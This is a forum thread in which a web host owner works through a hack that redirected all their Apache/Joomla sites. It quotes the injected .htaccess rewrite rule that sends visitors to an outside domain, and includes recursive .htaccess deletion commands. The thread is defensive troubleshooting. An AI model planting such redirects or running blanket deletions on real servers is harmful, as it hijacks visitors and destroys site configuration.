Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people, just like you, are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
Solved

I was hacked - apache -webhosting

Posted on 2010-08-18
15
1,402 Views
Last Modified: 2012-05-10
Hi,

I have all websites on my server redirected to nonsense IP address.

1. It is not dns, since I have my clients on different registrars
2. it is not mysql because even simple pages are redirected
3. dns ping from my domains give me correct = my IP address

Heeeelp, please urgently or I am dead.
0
Comment
Question by:jbmd
15 Comments
 
LVL 7

Accepted Solution

by:
Milind Koyande earned 250 total points
ID: 33462036
Hello,

I would suggest you to check you website pages as it might possible that someone injected malicious scripts in them. Also scan your server for viruses or any backdoor.
0
 

Author Comment

by:jbmd
ID: 33462066
I checked my folders in my Inetpub  and noticed that all folders have the fresh date 18 August 2: and so.
0
 

Author Comment

by:jbmd
ID: 33462080
I am finding this file: .htaccess with this inside:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://musikkorps.com/mainfile.php

the file is in apache, am searching for more
0
Connect further...control easier

With the ATEN CE624, you can now enjoy a high-quality visual experience powered by HDBaseT technology and the convenience of a single Cat6 cable to transmit uncompressed video with zero latency and multi-streaming for dual-view applications where remote access is required.

 

Author Comment

by:jbmd
ID: 33462100
this file is everywhere in my inetpub folders. i am removing it but how can I prevent it for the next time?
0
 

Author Comment

by:jbmd
ID: 33462131
QUESTION: since it is endless amount of this file spread in my inetpub directory, what is the crucial location, i.e. where should I go first to remove it so as the websites will function again?
0
 

Author Comment

by:jbmd
ID: 33462229
Ok, the answer is to remove it from the www root.

ANOTHER QUESTION:
is there a php script available I can use to dele htaccess files from todays date in one step?
0
 
LVL 3

Expert Comment

by:captainmish
ID: 33462542
To prevent this particular attack happening again, the easy fix is to add " AllowOverride None" to your apache config, this will prevent apache from using .htaccess files. If you do not use .htaccess files anywhere and want to delete them, you could just use a bash script to remove any (though it would be better to have all directories as read only for the apache user):

# find and remove all .htaccess files under /var/www
find /var/www/ -name '.htaccess' -exec rm {} \;

To make your directories read only, you could chmod ugo-w {directory} (add -r to make it recursive and change all directories). Some apps will need a few directories to be writeable, eg for cache, uploads etc, so be careful when changing directory permissions.

Have a look at http://httpd.apache.org/docs/current/misc/security_tips.html for some other good security tips.
0
 

Author Comment

by:jbmd
ID: 33462586
unfurtonately I use Joomla with SEF-URL for almost all my clients, so .httaccess is inevitable.
0
 

Author Comment

by:jbmd
ID: 33462672
I have windows OS, so what is a shell command for removing .httaccess from inetpub?
0
 
LVL 3

Expert Comment

by:csalaski
ID: 33462683
Have you checked Joomla and any of the makers of the plugins for patches to address security issues?
0
 
LVL 3

Expert Comment

by:captainmish
ID: 33462794
On windows you could make a batch file that runs

cd \your\web\root <- replace with inetpub or your webroot path
del /S .htaccess

This will recursively delete all .htaccess files (I have not tested this as I dont have a windows computer to play with, so try it first where it wont destroy things!). You could then add this as a scheduled task to run every day/hour etc
0
 
LVL 3

Assisted Solution

by:captainmish
captainmish earned 250 total points
ID: 33462806
You could write the htaccess stuff into the virtual host configurations for apache, instead of using htaccess files, it sounds like these may have been overwritten anyway, so it may be time for restoring your backups. Another way around it would be to restore the .htaccess files, then use windows file permissions to remove write access to them. If you cannot avoid htaccess files, restore and permission is the only way I can think of to get around this.
0
 

Author Comment

by:jbmd
ID: 33463682
csalaski: -> it happened also on freshly installed joomla
0
 

Author Comment

by:jbmd
ID: 33463729
is there a way how to forbid overwritting .httaccess in general config of apache?
(I have windows).

I do not want to do it od windows folder level manualy since I have a lot of files.
0
 
LVL 3

Assisted Solution

by:captainmish
captainmish earned 250 total points
ID: 33463909
Not sure about a way to make htaccess read only at apache level, and it probably wont help as the exploit will have used a shell escape (file system level) to write to those files. You could just do a windows search for .htaccess starting at the inetpub level, select all, and make read only?
0

Featured Post

Free Tool: IP Lookup

Get more info about an IP address or domain name, such as organization, abuse contacts and geolocation.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
.dwt files not viewable in browser - why? 2 101
Apache Issues 9 86
web & database SERVERS -- PHYSICAL & VM ? 5 72
Create link to folder for use with apache. 7 28
This is a guide to setting up a new WHM/cPanel Server to be used for web hosting accounts. It is intended for web hosting company administrators and dedicated server owners. For under $99 per month (considering normal rate of Big Data Cetnters like …
It is possible to boost certain documents at query time in Solr. Query time boosting can be a powerful resource for finding the most relevant and "best" content. Of course the more information you index, the more fields you will be able to use for y…
Microsoft Active Directory, the widely used IT infrastructure, is known for its high risk of credential theft. The best way to test your Active Directory’s vulnerabilities to pass-the-ticket, pass-the-hash, privilege escalation, and malware attacks …
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…

792 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question